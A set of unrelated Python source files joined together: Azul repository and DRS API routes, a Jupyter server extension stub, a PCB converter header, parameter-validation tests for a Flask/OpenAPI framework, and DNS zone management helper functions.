'tags': ['Repository'],
'parameters': [
catalog_param_spec,
*file_fqid_parameters_spec,
params.query(
'fileName',
schema.optional(str),
description=format_description('''
The desired name of the file. The given value will be included
in the Content-Disposition header of the response. If absent, a
best effort to determine the file name from metadata will be
made. If that fails, the UUID of the file will be used instead.
''')
),
params.query(
'wait',
schema.optional(int),
description=format_description('''
If 0, the client is responsible for honoring the waiting
period specified in the Retry-After response header. If 1, the
server will delay the response in order to consume as much of
that waiting period as possible. This parameter should only be
set to 1 by clients who can't honor the `Retry-After` header,
preventing them from quickly exhausting the maximum number of
redirects. If the server cannot wait the full amount, any
amount of wait time left will still be returned in the
Retry-After header of the response.
''')
),
params.query(
'replica',
schema.optional(str),
description=format_description('''
If the underlying repository offers multiple replicas of the
requested file, use the specified replica. Otherwise, this
parameter is ignored. If absent, the only replica — for
repositories that don't support replication — or the default
replica — for those that do — will be used.
'''),
),
params.query(
'requestIndex',
schema.optional(int),
description='Do not use. Reserved for internal purposes.'
),
params.query(
'drsPath',
schema.optional(str),
description='Do not use. Reserved for internal purposes.'
),
token_param_spec
]
}
@app.route('/repository/files/{file_uuid}', methods=['GET'], cors=True, method_spec={
**repository_files_spec,
'summary': 'Redirect to a URL for downloading a given data file from the '
'underlying repository',
'responses': {
'301': {
'description': format_description('''
A URL to the given file is still being prepared. Retry by
waiting the number of seconds specified in the `Retry-After`
header of the response and the requesting the URL specified in
the `Location` header.
'''),
'headers': {
'Location': responses.header(str, description=format_description('''
A URL pointing back at this endpoint, potentially with
different or additional request parameters.
''')),
'Retry-After': responses.header(int, description=format_description('''
Recommended number of seconds to wait before requesting the
URL specified in the `Location` header. The response may
carry this header even if server-side waiting was requested
via `wait=1`.
'''))
}
},
'302': {
'description': format_description('''
The file can be downloaded from the URL returned in the
`Location` header.
'''),
'headers': {
'Location': responses.header(str, description=format_description('''
A URL that will yield the actual content of the file.
''')),
'Content-Disposition': responses.header(str, description=format_description('''
Set to a value that makes user agents download the file
instead of rendering it, suggesting a meaningful name
for the downloaded file stored on the user's file
system. The suggested file name is taken from the
`fileName` request parameter or, if absent, from
metadata describing the file. It generally does not
correlate with the path component of the URL returned
in the `Location` header.
'''))
}
},
}
})
def repository_files(file_uuid: str) -> Response:
result = _repository_files(file_uuid, fetch=False)
status_code = result.pop('Status')
return Response(body='',
headers={k: str(v) for k, v in result.items()},
status_code=status_code)
@app.route('/fetch/repository/files/{file_uuid}', methods=['GET'], cors=True, method_spec={
**repository_files_spec,
'summary': 'Request a URL for downloading a given data file',
'responses': {
'200': {
'description': format_description(f'''
Emulates the response code and headers of {one(repository_files.path)}
while bypassing the default user agent behavior. Note that the
status code of a successful response will be 200 while the
`Status` field of its body will be 302.
The response described here is intended to be processed by
client-side Javascript such that the emulated headers can
be handled in Javascript rather than relying on the native
implementation by the web browser.
'''),
**responses.json_content(
schema.object(
Status=int,
Location=str,
)
)
}
}
})
def fetch_repository_files(file_uuid: str) -> Response:
body = _repository_files(file_uuid, fetch=True)
return Response(body=json.dumps(body), status_code=200)
def _repository_files(file_uuid: str, fetch: bool) -> MutableJSON:
request = app.current_request
query_params = request.query_params or {}
headers = request.headers
def validate_replica(replica: str) -> None:
if replica not in ('aws', 'gcp'):
raise ValueError
def validate_wait(wait: Optional[str]) -> Optional[int]:
if wait is None:
return None
elif wait == '0':
return False
elif wait == '1':
return True
else:
raise ValueError
validate_params(query_params,
catalog=str,
version=str,
fileName=str,
wait=validate_wait,
requestIndex=int,
replica=validate_replica,
drsPath=str,
token=str)
# FIXME: Prevent duplicate filenames from files in different subgraphs by
# prepending the subgraph UUID to each filename when downloaded
# https://github.com/DataBiosphere/azul/issues/2682
catalog = app.catalog
return app.repository_controller.download_file(catalog=catalog,
fetch=fetch,
file_uuid=file_uuid,
query_params=query_params,
headers=headers,
authentication=request.authentication)
@app.route('/repository/sources', methods=['GET'], cors=True, method_spec={
'summary': 'List available data sources',
'tags': ['Repository'],
'parameters': [catalog_param_spec],
'responses': {
'200': {
'description': format_description('''
List the sources the currently authenticated user is authorized
to access in the underlying data repository.
'''),
**responses.json_content(
schema.object(sources=schema.array(
schema.object(
sourceId=str,
sourceSpec=str,
)
))
)
},
}
})
def list_sources() -> Response:
validate_params(app.current_request.query_params or {},
catalog=validate_catalog)
sources = app.repository_controller.list_sources(app.catalog,
app.current_request.authentication)
return Response(body={'sources': sources}, status_code=200)
@app.route('/url', methods=['POST'], cors=True)
def shorten_query_url():
"""
Take a URL as input and return a (potentially) shortened URL that will redirect to the given URL
parameters:
- name: url
in: body
type: string
description: URL to shorten
:return: A 200 response with JSON body containing the shortened URL:
```
{
"url": "http://url.singlecell.gi.ucsc.edu/b3N"
}
```
A 400 error is returned if an invalid URL is given. This could be a URL that is not whitelisted
or a string that is not a valid web URL.
"""
try:
url = app.current_request.json_body['url']
except KeyError:
raise BadRequestError('`url` must be given in the request body')
url_hostname = urllib.parse.urlparse(url).netloc
if 0 == len(list(filter(
lambda whitelisted_url: re.fullmatch(whitelisted_url, url_hostname),
config.url_shortener_whitelist
))):
raise BadRequestError('Invalid URL given')
url_hash = hash_url(url)
storage_service = StorageService(config.url_redirect_full_domain_name)
def get_url_response(path):
return {'url': f'http://{config.url_redirect_full_domain_name}/{path}'}
key_length = 3
while key_length <= len(url_hash):
key = url_hash[:key_length]
try:
existing_url = storage_service.get(key).decode(encoding='utf-8')
except storage_service.client.exceptions.NoSuchKey:
try:
storage_service.put(key,
data=bytes(url, encoding='utf-8'),
ACL='public-read',
WebsiteRedirectLocation=url)
except ClientError as e:
if e.response['Error']['Code'] == 'InvalidRedirectLocation':
raise BadRequestError('Invalid URL given')
else:
raise
return get_url_response(key)
if existing_url == url:
return get_url_response(key)
key_length += 1
raise ChaliceViewError('Could not create shortened URL')
def hash_url(url):
url_hash = hashlib.sha1(bytes(url, encoding='utf-8')).digest()
return base64.urlsafe_b64encode(url_hash).decode()
drs_spec_description = format_description('''
This is a partial implementation of the
[DRS 1.0.0 spec](https://ga4gh.github.io/data-repository-service-schemas/preview/release/drs-1.0.0/docs/).
Not all features are implemented. This endpoint acts as a DRS-compliant
proxy for accessing files in the underlying repository.
Any errors encountered from the underlying repository are forwarded on as
errors from this endpoint.
''')
@app.route(
drs.drs_object_url_path('{file_uuid}'),
methods=['GET'],
enabled=config.is_dss_enabled(),
cors=True,
method_spec={
'summary': 'Get file DRS object',
'tags': ['DRS'],
'description': format_description('''
This endpoint returns object metadata, and a list of access methods that can
be used to fetch object bytes.
''') + drs_spec_description,
'parameters': file_fqid_parameters_spec,
'responses': {
'200': {
'description': format_description('''
A DRS object is returned. Two
[`AccessMethod`s](https://ga4gh.github.io/data-repository-service-schemas/preview/release/drs-1.1.0/docs/#_accessmethod)
are included:
{access_methods}
If the object is not immediately ready, an `access_id` will be
returned instead of an `access_url`.
''', access_methods='\n'.join(f'- {am!s}' for am in AccessMethod)),
**app.drs_controller.get_object_response_schema()
}
},
}
)
def get_data_object(file_uuid):
"""
Return a DRS data object dictionary for a given DSS file UUID and version.
If the file is already checked out, we can return a drs_object with a URL
immediately. Otherwise, we need to send the request through the /access
endpoint.
"""
query_params = app.current_request.query_params or {}
validate_params(query_params, version=str)
return app.drs_controller.get_object(file_uuid, query_params)
@app.route(
drs.drs_object_url_path('{file_uuid}', access_id='{access_id}'),
methods=['GET'],
enabled=config.is_dss_enabled(),
cors=True,
method_spec={
'summary': 'Get a file with an access ID',
'description': format_description('''
This endpoint returns a URL that can be used to fetch the bytes of a DRS
object.
This method only needs to be called when using an `AccessMethod` that
contains an `access_id`.
An `access_id` is returned when the underlying file is not ready. When
the underlying repository is the DSS, the 202 response allowed time for
the DSS to do a checkout.
''') + drs_spec_description,
'parameters': [
*file_fqid_parameters_spec,
params.path('access_id', str, description='Access ID returned from a previous request')
],
'responses': {
'202': {
'description': format_description('''
This response is issued if the object is not yet ready. Respect
the `Retry-After` header, then try again.
'''),
'headers': {
'Retry-After': responses.header(str, description=format_description('''
Recommended number of seconds to wait before requesting the
URL specified in the Location header.
'''))
}
},
'200': {
'description': format_description('''
The object is ready. The URL is in the response object.
'''),
**responses.json_content(schema.object(url=str))
}
},
'tags': ['DRS']
}
)
def get_data_object_access(file_uuid, access_id):
query_params = app.current_request.query_params or {}
validate_params(query_params, version=str)
return app.drs_controller.get_object_access(access_id, file_uuid, query_params)
@app.route(
drs.dos_object_url_path('{file_uuid}'),
methods=['GET'],
enabled=config.is_dss_enabled(),
cors=True
)
def dos_get_data_object(file_uuid):
"""
Return a DRS data object dictionary for a given DSS file UUID and version.
"""
request = app.current_request
query_params = request.query_params or {}
validate_params(query_params,
version=str,
catalog=config.Catalog.validate_name)
catalog = app.catalog
file_version = query_params.get('version')
return app.drs_controller.dos_get_object(catalog,
file_uuid,
file_version,
request.authentication)
|
from .handlers import TutorialHandler
def _jupyter_server_extension_points():
return [{
"module": "mybutton"
}]
def load_jupyter_server_extension(server_app):
handlers = [("/mybutton/hello", TutorialHandler)]
server_app.web_app.add_handlers(".*$", handlers)
|
# Kaolin PCB Converter Utility
#
# ILAN E. MOYER
# March 30th, 2021
#
# One goal of the Kaolin project is to embed the design for an MCU's PCB within the memory of the MCU
# This script reads in an Autodesk Eagle PCB (.brd) file, and converts it into the Kaolin format, and
# saves out an Intel HEX file.
import xml.etree.ElementTree as ET
|
from io import BytesIO
import json
from typing import List
import flask
import pytest
def test_parameter_validation(simple_app):
app_client = simple_app.app.test_client()
url = "/v1.0/test_parameter_validation"
response = app_client.get(url, query_string={"date": "2015-08-26"}) # type: flask.Response
assert response.status_code == 200
for invalid_int in "", "foo", "0.1":
response = app_client.get(url, query_string={"int": invalid_int}) # type: flask.Response
assert response.status_code == 400
response = app_client.get(url, query_string={"int": "123"}) # type: flask.Response
assert response.status_code == 200
for invalid_bool in "", "foo", "yes":
response = app_client.get(url, query_string={"bool": invalid_bool}) # type: flask.Response
assert response.status_code == 400
response = app_client.get(url, query_string={"bool": "true"}) # type: flask.Response
assert response.status_code == 200
def test_required_query_param(simple_app):
app_client = simple_app.app.test_client()
url = "/v1.0/test_required_query_param"
response = app_client.get(url)
assert response.status_code == 400
response = app_client.get(url, query_string={"n": "1.23"})
assert response.status_code == 200
def test_array_query_param(simple_app):
app_client = simple_app.app.test_client()
headers = {"Content-type": "application/json"}
url = "/v1.0/test_array_csv_query_param"
response = app_client.get(url, headers=headers)
array_response: List[str] = json.loads(response.data.decode("utf-8", "replace"))
assert array_response == ["squash", "banana"]
url = "/v1.0/test_array_csv_query_param?items=one,two,three"
response = app_client.get(url, headers=headers)
array_response: List[str] = json.loads(response.data.decode("utf-8", "replace"))
assert array_response == ["one", "two", "three"]
url = "/v1.0/test_array_pipes_query_param?items=1|2|3"
response = app_client.get(url, headers=headers)
array_response: List[int] = json.loads(response.data.decode("utf-8", "replace"))
assert array_response == [1, 2, 3]
url = "/v1.0/test_array_unsupported_query_param?items=1;2;3"
response = app_client.get(url, headers=headers)
array_response: List[str] = json.loads(
response.data.decode("utf-8", "replace"),
) # unsupported collectionFormat
assert array_response == ["1;2;3"]
url = "/v1.0/test_array_csv_query_param?items=A&items=B&items=C&items=D,E,F"
response = app_client.get(url, headers=headers)
array_response: List[str] = json.loads(
response.data.decode("utf-8", "replace"),
) # multi array with csv format
assert array_response == ["D", "E", "F"]
url = "/v1.0/test_array_multi_query_param?items=A&items=B&items=C&items=D,E,F"
response = app_client.get(url, headers=headers)
array_response: List[str] = json.loads(
response.data.decode("utf-8", "replace"),
) # multi array with csv format
assert array_response == ["A", "B", "C", "D", "E", "F"]
url = "/v1.0/test_array_pipes_query_param?items=4&items=5&items=6&items=7|8|9"
response = app_client.get(url, headers=headers)
array_response: List[int] = json.loads(
response.data.decode("utf-8", "replace"),
) # multi array with pipes format
assert array_response == [7, 8, 9]
def test_array_form_param(simple_app):
app_client = simple_app.app.test_client()
headers = {"Content-type": "application/x-www-form-urlencoded"}
url = "/v1.0/test_array_csv_form_param"
response = app_client.post(url, headers=headers)
array_response: List[str] = json.loads(response.data.decode("utf-8", "replace"))
assert array_response == ["squash", "banana"]
url = "/v1.0/test_array_csv_form_param"
response = app_client.post(url, headers=headers, data={"items": "one,two,three"})
array_response: List[str] = json.loads(response.data.decode("utf-8", "replace"))
assert array_response == ["one", "two", "three"]
url = "/v1.0/test_array_pipes_form_param"
response = app_client.post(url, headers=headers, data={"items": "1|2|3"})
array_response: List[int] = json.loads(response.data.decode("utf-8", "replace"))
assert array_response == [1, 2, 3]
url = "/v1.0/test_array_csv_form_param"
data = "items=A&items=B&items=C&items=D,E,F"
response = app_client.post(url, headers=headers, data=data)
array_response: List[str] = json.loads(
response.data.decode("utf-8", "replace"),
) # multi array with csv format
assert array_response == ["D", "E", "F"]
url = "/v1.0/test_array_pipes_form_param"
data = "items=4&items=5&items=6&items=7|8|9"
response = app_client.post(url, headers=headers, data=data)
array_response: List[int] = json.loads(
response.data.decode("utf-8", "replace"),
) # multi array with pipes format
assert array_response == [7, 8, 9]
def test_extra_query_param(simple_app):
app_client = simple_app.app.test_client()
headers = {"Content-type": "application/json"}
url = "/v1.0/test_parameter_validation?extra_parameter=true"
resp = app_client.get(url, headers=headers)
assert resp.status_code == 200
def test_strict_extra_query_param(strict_app):
app_client = strict_app.app.test_client()
headers = {"Content-type": "application/json"}
url = "/v1.0/test_parameter_validation?extra_parameter=true"
resp = app_client.get(url, headers=headers)
assert resp.status_code == 400
response = json.loads(resp.data.decode("utf-8", "replace"))
assert response["detail"] == "Extra query parameter extra_parameter not in spec"
def test_strict_formdata_param(strict_app):
app_client = strict_app.app.test_client()
headers = {"Content-type": "application/x-www-form-urlencoded"}
url = "/v1.0/test_array_csv_form_param"
resp = app_client.post(url, headers=headers, data={"items": "mango"})
response = json.loads(resp.data.decode("utf-8", "replace"))
assert response == ["mango"]
assert resp.status_code == 200
@pytest.mark.parametrize(
"arg, result",
[
# The cases accepted by the Flask/Werkzeug converter
["123", "int 123"],
["0", "int 0"],
["0000", "int 0"],
# Additional cases that we want to support
["+123", "int 123"],
["+0", "int 0"],
["-0", "int 0"],
["-123", "int -123"],
],
)
def test_path_parameter_someint(simple_app, arg, result):
assert isinstance(arg, str) # sanity check
app_client = simple_app.app.test_client()
resp = app_client.get(f"/v1.0/test-int-path/{arg}") # type: flask.Response
assert resp.data.decode("utf-8", "replace") == f'"{result}"\n'
def test_path_parameter_someint__bad(simple_app):
# non-integer values will not match Flask route
app_client = simple_app.app.test_client()
resp = app_client.get("/v1.0/test-int-path/foo") # type: flask.Response
assert resp.status_code == 404
@pytest.mark.parametrize(
"arg, result",
[
# The cases accepted by the Flask/Werkzeug converter
["123.45", "float 123.45"],
["123.0", "float 123"],
["0.999999999999999999", "float 1"],
# Additional cases that we want to support
["+123.45", "float 123.45"],
["-123.45", "float -123.45"],
["123.", "float 123"],
[".45", "float 0.45"],
["123", "float 123"],
["0", "float 0"],
["0000", "float 0"],
["-0.000000001", "float -1e-09"],
["100000000000", "float 1e+11"],
],
)
def test_path_parameter_somefloat(simple_app, arg, result):
assert isinstance(arg, str) # sanity check
app_client = simple_app.app.test_client()
resp = app_client.get(f"/v1.0/test-float-path/{arg}") # type: flask.Response
assert resp.data.decode("utf-8", "replace") == f'"{result}"\n'
def test_path_parameter_somefloat__bad(simple_app):
# non-float values will not match Flask route
app_client = simple_app.app.test_client()
resp = app_client.get("/v1.0/test-float-path/123,45") # type: flask.Response
assert resp.status_code == 404
def test_default_param(strict_app):
app_client = strict_app.app.test_client()
resp = app_client.get("/v1.0/test-default-query-parameter")
assert resp.status_code == 200
response = json.loads(resp.data.decode("utf-8", "replace"))
assert response["app_name"] == "especifico"
def test_falsy_param(simple_app):
app_client = simple_app.app.test_client()
resp = app_client.get("/v1.0/test-falsy-param", query_string={"falsy": 0})
assert resp.status_code == 200
response = json.loads(resp.data.decode("utf-8", "replace"))
assert response == 0
resp = app_client.get("/v1.0/test-falsy-param")
assert resp.status_code == 200
response = json.loads(resp.data.decode("utf-8", "replace"))
assert response == 1
def test_formdata_param(simple_app):
app_client = simple_app.app.test_client()
resp = app_client.post("/v1.0/test-formData-param", data={"formData": "test"})
assert resp.status_code == 200
response = json.loads(resp.data.decode("utf-8", "replace"))
assert response == "test"
def test_formdata_bad_request(simple_app):
app_client = simple_app.app.test_client()
resp = app_client.post("/v1.0/test-formData-param")
assert resp.status_code == 400
response = json.loads(resp.data.decode("utf-8", "replace"))
assert response["detail"] in [
"Missing formdata parameter 'formData'",
"'formData' is a required property", # OAS3
]
def test_formdata_missing_param(simple_app):
app_client = simple_app.app.test_client()
resp = app_client.post("/v1.0/test-formData-missing-param", data={"missing_formData": "test"})
assert resp.status_code == 200
def test_formdata_extra_param(simple_app):
app_client = simple_app.app.test_client()
resp = app_client.post(
"/v1.0/test-formData-param", data={"formData": "test", "extra_formData": "test"},
)
assert resp.status_code == 200
def test_strict_formdata_extra_param(strict_app):
app_client = strict_app.app.test_client()
resp = app_client.post(
"/v1.0/test-formData-param", data={"formData": "test", "extra_formData": "test"},
)
assert resp.status_code == 400
response = json.loads(resp.data.decode("utf-8", "replace"))
assert response["detail"] == "Extra formData parameter extra_formData not in spec"
def test_formdata_file_upload(simple_app):
app_client = simple_app.app.test_client()
resp = app_client.post(
"/v1.0/test-formData-file-upload",
data={"formData": (BytesIO(b"file contents"), "filename.txt")},
)
assert resp.status_code == 200
response = json.loads(resp.data.decode("utf-8", "replace"))
assert response == {"filename.txt": "file contents"}
def test_formdata_file_upload_bad_request(simple_app):
app_client = simple_app.app.test_client()
resp = app_client.post("/v1.0/test-formData-file-upload")
assert resp.status_code == 400
response = json.loads(resp.data.decode("utf-8", "replace"))
assert response["detail"] in [
"Missing formdata parameter 'formData'",
"'formData' is a required property", # OAS3
]
def test_formdata_file_upload_missing_param(simple_app):
app_client = simple_app.app.test_client()
resp = app_client.post(
"/v1.0/test-formData-file-upload-missing-param",
data={"missing_formData": (BytesIO(b"file contents"), "example.txt")},
)
assert resp.status_code == 200
def test_body_not_allowed_additional_properties(simple_app):
app_client = simple_app.app.test_client()
body = {"body1": "bodyString", "additional_property": "test1"}
resp = app_client.post(
"/v1.0/body-not-allowed-additional-properties",
data=json.dumps(body),
headers={"Content-Type": "application/json"},
)
assert resp.status_code == 400
response = json.loads(resp.data.decode("utf-8", "replace"))
assert "Additional properties are not allowed" in response["detail"]
def test_bool_as_default_param(simple_app):
app_client = simple_app.app.test_client()
resp = app_client.get("/v1.0/test-bool-param")
assert resp.status_code == 200
resp = app_client.get("/v1.0/test-bool-param", query_string={"thruthiness": True})
assert resp.status_code == 200
response = json.loads(resp.data.decode("utf-8", "replace"))
assert response is True
def test_bool_param(simple_app):
app_client = simple_app.app.test_client()
resp = app_client.get("/v1.0/test-bool-param", query_string={"thruthiness": True})
assert resp.status_code == 200
response = json.loads(resp.data.decode("utf-8", "replace"))
assert response is True
resp = app_client.get("/v1.0/test-bool-param", query_string={"thruthiness": False})
assert resp.status_code == 200
response = json.loads(resp.data.decode("utf-8", "replace"))
assert response is False
def test_bool_array_param(simple_app):
app_client = simple_app.app.test_client()
resp = app_client.get("/v1.0/test-bool-array-param?thruthiness=true,true,true")
assert resp.status_code == 200
response = json.loads(resp.data.decode("utf-8", "replace"))
assert response is True
app_client = simple_app.app.test_client()
resp = app_client.get("/v1.0/test-bool-array-param?thruthiness=true,true,false")
assert resp.status_code == 200
response = json.loads(resp.data.decode("utf-8", "replace"))
assert response is False
app_client = simple_app.app.test_client()
resp = app_client.get("/v1.0/test-bool-array-param")
assert resp.status_code == 200
def test_required_param_miss_config(simple_app):
app_client = simple_app.app.test_client()
resp = app_client.get("/v1.0/test-required-param")
assert resp.status_code == 400
resp = app_client.get("/v1.0/test-required-param", query_string={"simple": "test"})
assert resp.status_code == 200
resp = app_client.get("/v1.0/test-required-param")
assert resp.status_code == 400
def test_parameters_defined_in_path_level(simple_app):
app_client = simple_app.app.test_client()
resp = app_client.get("/v1.0/parameters-in-root-path?title=nice-get")
assert resp.status_code == 200
assert json.loads(resp.data.decode("utf-8", "replace")) == ["nice-get"]
resp = app_client.get("/v1.0/parameters-in-root-path")
assert resp.status_code == 400
def test_array_in_path(simple_app):
app_client = simple_app.app.test_client()
resp = app_client.get("/v1.0/test-array-in-path/one_item")
assert json.loads(resp.data.decode("utf-8", "replace")) == ["one_item"]
resp = app_client.get("/v1.0/test-array-in-path/one_item,another_item")
assert json.loads(resp.data.decode("utf-8", "replace")) == [
"one_item",
"another_item",
]
def test_nullable_parameter(simple_app):
app_client = simple_app.app.test_client()
resp = app_client.get("/v1.0/nullable-parameters?time_start=null")
assert json.loads(resp.data.decode("utf-8", "replace")) == "it was None"
resp = app_client.get("/v1.0/nullable-parameters?time_start=None")
assert json.loads(resp.data.decode("utf-8", "replace")) == "it was None"
time_start = 1010
resp = app_client.get(f"/v1.0/nullable-parameters?time_start={time_start}")
assert json.loads(resp.data.decode("utf-8", "replace")) == time_start
resp = app_client.post("/v1.0/nullable-parameters", data={"post_param": "None"})
assert json.loads(resp.data.decode("utf-8", "replace")) == "it was None"
resp = app_client.post("/v1.0/nullable-parameters", data={"post_param": "null"})
assert json.loads(resp.data.decode("utf-8", "replace")) == "it was None"
headers = {"Content-Type": "application/json"}
resp = app_client.put("/v1.0/nullable-parameters", data="null", headers=headers)
assert json.loads(resp.data.decode("utf-8", "replace")) == "it was None"
resp = app_client.put("/v1.0/nullable-parameters", data="None", headers=headers)
assert json.loads(resp.data.decode("utf-8", "replace")) == "it was None"
resp = app_client.put("/v1.0/nullable-parameters-noargs", data="None", headers=headers)
assert json.loads(resp.data.decode("utf-8", "replace")) == "hello"
def test_args_kwargs(simple_app):
app_client = simple_app.app.test_client()
resp = app_client.get("/v1.0/query-params-as-kwargs")
assert resp.status_code == 200
assert json.loads(resp.data.decode("utf-8", "replace")) == {}
resp = app_client.get("/v1.0/query-params-as-kwargs?foo=a&bar=b")
assert resp.status_code == 200
assert json.loads(resp.data.decode("utf-8", "replace")) == {"foo": "a"}
if simple_app._spec_file == "openapi.yaml":
body = {"foo": "a", "bar": "b"}
resp = app_client.post(
"/v1.0/body-params-as-kwargs",
data=json.dumps(body),
headers={"Content-Type": "application/json"},
)
assert resp.status_code == 200
# having only kwargs, the handler would have been passed 'body'
assert json.loads(resp.data.decode("utf-8", "replace")) == {
"body": {"foo": "a", "bar": "b"},
}
def test_param_sanitization(simple_app):
app_client = simple_app.app.test_client()
resp = app_client.post("/v1.0/param-sanitization")
assert resp.status_code == 200
assert json.loads(resp.data.decode("utf-8", "replace")) == {}
resp = app_client.post(
"/v1.0/param-sanitization?$query=queryString", data={"$form": "formString"},
)
assert resp.status_code == 200
assert json.loads(resp.data.decode("utf-8", "replace")) == {
"query": "queryString",
"form": "formString",
}
body = {"body1": "bodyString", "body2": "otherString"}
resp = app_client.post(
"/v1.0/body-sanitization",
data=json.dumps(body),
headers={"Content-Type": "application/json"},
)
assert resp.status_code == 200
assert json.loads(resp.data.decode("utf-8", "replace")) == body
body = {"body1": "bodyString", "body2": 12, "body3": {"a": "otherString"}}
resp = app_client.post(
"/v1.0/body-sanitization-additional-properties",
data=json.dumps(body),
headers={"Content-Type": "application/json"},
)
assert resp.status_code == 200
assert json.loads(resp.data.decode("utf-8", "replace")) == body
body = {
"body1": "bodyString",
"additional_property": "test1",
"additional_property2": "test2",
}
resp = app_client.post(
"/v1.0/body-sanitization-additional-properties-defined",
data=json.dumps(body),
headers={"Content-Type": "application/json"},
)
assert resp.status_code == 200
assert json.loads(resp.data.decode("utf-8", "replace")) == body
def test_no_sanitization_in_request_body(simple_app):
app_client = simple_app.app.test_client()
data = {
"name": "John",
"$surname": "Doe",
"1337": True,
"!#/bin/sh": False,
"(1/0)": "division by zero",
"s/$/EOL/": "regular expression",
"@8am": "time",
}
response = app_client.post("/v1.0/forward", json=data)
assert response.status_code == 200
assert response.json == data
def test_parameters_snake_case(snake_case_app):
app_client = snake_case_app.app.test_client()
headers = {"Content-type": "application/json"}
resp = app_client.post(
"/v1.0/test-post-path-snake/123",
headers=headers,
data=json.dumps({"a": "test"}),
)
assert resp.status_code == 200
resp = app_client.post(
"/v1.0/test-post-path-shadow/123",
headers=headers,
data=json.dumps({"a": "test"}),
)
assert resp.status_code == 200
resp = app_client.post(
"/v1.0/test-post-query-snake?someId=123",
headers=headers,
data=json.dumps({"a": "test"}),
)
assert resp.status_code == 200
resp = app_client.post(
"/v1.0/test-post-query-shadow?id=123&class=header",
headers=headers,
data=json.dumps({"a": "test"}),
)
assert resp.status_code == 200
resp = app_client.get("/v1.0/test-get-path-snake/123")
assert resp.status_code == 200
resp = app_client.get("/v1.0/test-get-path-shadow/123")
assert resp.status_code == 200
resp = app_client.get("/v1.0/test-get-query-snake?someId=123")
assert resp.status_code == 200
resp = app_client.get("/v1.0/test-get-query-shadow?list=123")
assert resp.status_code == 200
# Tests for when CamelCase parameter is supplied, of which the snake_case version
# matches an existing parameter and view func argument, or vice versa
resp = app_client.get("/v1.0/test-get-camel-case-version?truthiness=true&orderBy=asc")
assert resp.status_code == 200
assert resp.get_json() == {"truthiness": True, "order_by": "asc"}
resp = app_client.get("/v1.0/test-get-camel-case-version?truthiness=5")
assert resp.status_code == 400
assert (
resp.get_json()["detail"]
== "Wrong type, expected 'boolean' for query parameter 'truthiness'"
)
# Incorrectly cased params should be ignored
resp = app_client.get("/v1.0/test-get-camel-case-version?Truthiness=true&order_by=asc")
assert resp.status_code == 200
assert resp.get_json() == {"truthiness": False, "order_by": None} # default values
resp = app_client.get("/v1.0/test-get-camel-case-version?Truthiness=5&order_by=4")
assert resp.status_code == 200
assert resp.get_json() == {"truthiness": False, "order_by": None} # default values
# TODO: Add tests for body parameters
def test_get_unicode_request(simple_app):
"""Regression test for Python 2 UnicodeEncodeError bug during parameter parsing."""
app_client = simple_app.app.test_client()
resp = app_client.get("/v1.0/get_unicode_request?price=%C2%A319.99") # £19.99
assert resp.status_code == 200
assert json.loads(resp.data.decode("utf-8"))["price"] == "£19.99"
def test_cookie_param(simple_app):
app_client = simple_app.app.test_client()
app_client.set_cookie("localhost", "test_cookie", "hello")
response = app_client.get("/v1.0/test-cookie-param")
assert response.status_code == 200
assert response.json == {"cookie_value": "hello"}
|
#!/usr/bin/env python2
from flask import Response
from dns import query, zone, rdtypes, rdatatype, rdataclass, rdata, update, tsigkeyring
import dns.query
import dns.message
import dns.rdatatype
import dns.rdata
import dns.rdtypes
import dns.tsigkeyring
import dns.update
from .models import *
import urllib
import IPy
import json
import re
class Usuario(UserMixin):
def __init__(self, username, password):
self.id = username
self.password = password
def is_active(self):
return True
@staticmethod
def get(userid):
# user_database = [("sbuczak","qwe123")]
user_database = users.select().where(users.username == userid)
for users_get in user_database:
if users_get.username == userid:
return Usuario(users_get.username, users_get.password)
return None
def get_zone_changes(zona):
""" Get the list of modifications in queue """
modlist = []
for item in zones.select().where(zones.zone == zona):
zona_id = item.id
for mod in change_cache.select().where(change_cache.zone_id == zona_id):
# safeurl_data = urllib.quote_plus(mod.data)
modlist.append({'id': mod.id,
'username': mod.username,
'rr': mod.rr,
'zone_id': mod.zone_id,
'type': mod.type,
'ttl': mod.ttl,
'data': mod.data,
'action': mod.action})
return modlist
def mod_change_cache(zona=None, rr=None, rtype=None, ttl=1800, data=None, action=None, username=None, del_id=None, operation=None):
"""Modify the publish queue"""
zone_id = zones.select().where(zones.zone == zona).get()
if rtype == "A" or rtype == "NS":
try:
IPy.parseAddress(data)
except ValueError:
return False
if operation == "add_unpub":
for item in [zona, rr, rtype, ttl, data, action, operation]:
if item is None:
return False
if change_cache.select().where(change_cache.rr == rr,
change_cache.zone_id == zone_id,
change_cache.type == rtype,
change_cache.data == data,
change_cache.action == "add").count():
return True
change_cache.create(username=username,
rr=rr,
zone_id=zone_id,
type=rtype,
ttl=ttl,
data=data,
action=action)
return True
elif operation == "del_unpub":
delete_query = change_cache.delete().where((change_cache.id == del_id) & (change_cache.zone_id == zone_id))
delete_query.execute()
return True
def get_view_server(view=None):
""" Gets the view's master server """
if view is not None:
view_server = views.select().where(views.name == view).get()
return view_server.server
def get_view_key(view=None):
""" Gets the view's tsig key """
if view is not None:
view_server = views.select().where(views.name == view).get()
view_key_dict = {str(view_server.tsig_key).split(" ", 1)[0]: str(view_server.tsig_key).split(" ", 1)[1]}
return view_key_dict
def get_zone_view(zone=None):
""" Gets the zone's view """
if zone is not None:
zone_view = zones.select().where(zones.zone == zone).get()
return zone_view.view
def get_zone_id(zone=None):
""" Gets zone id """
if zone is not None:
zone_get = zones.select().where(zones.zone == zone).get()
return zone_get.id
def get_zone_name(zone_id=None):
""" Gets zone name from id """
if zone is not None:
zone_get = zones.select().where(zones.id == zone_id).get()
return zone_get.zone
def get_zone_pools(zone=None):
""" Get zone Pools """
if zone is not None:
zone_id = get_zone_id(zone=zone)
pool_get = pools.select().where(pools.zone == zone)
for item in pool_get:
print item
return ""
def get_user_permissions(user=None):
""" Gets permissions for user """
if user is not None:
return_list = []
user_query = users.select().where(users.username == user).get()
for item in permissions.select().where(permissions.user_id == user_query.id):
return_list.append(item.zone_id)
return return_list
def get_user_list():
""" Get user list """
return_list = []
list_query = users.select()
for item in list_query:
return_list.append({'id': item.id,
'username': item.username})
return return_list
def get_user_role(user=None):
""" Gets role for user """
if user is not None:
role_query = roles.select(roles.role).where(roles.user == user).get()
return role_query.role
def get_zone_list(username=None):
""" Gets zone list """
if username is not None:
zone_list = []
authorized_zone_list = get_user_permissions(username)
for zone in zones.select().order_by(zones.zone):
if zone.id in authorized_zone_list:
change_qty = change_cache.select().where(change_cache.zone_id == zone.id).count()
zone_list.append({'id': zone.id,
'name': zone.zone,
'view': zone.view,
'change_qty': change_qty})
return zone_list
return []
#
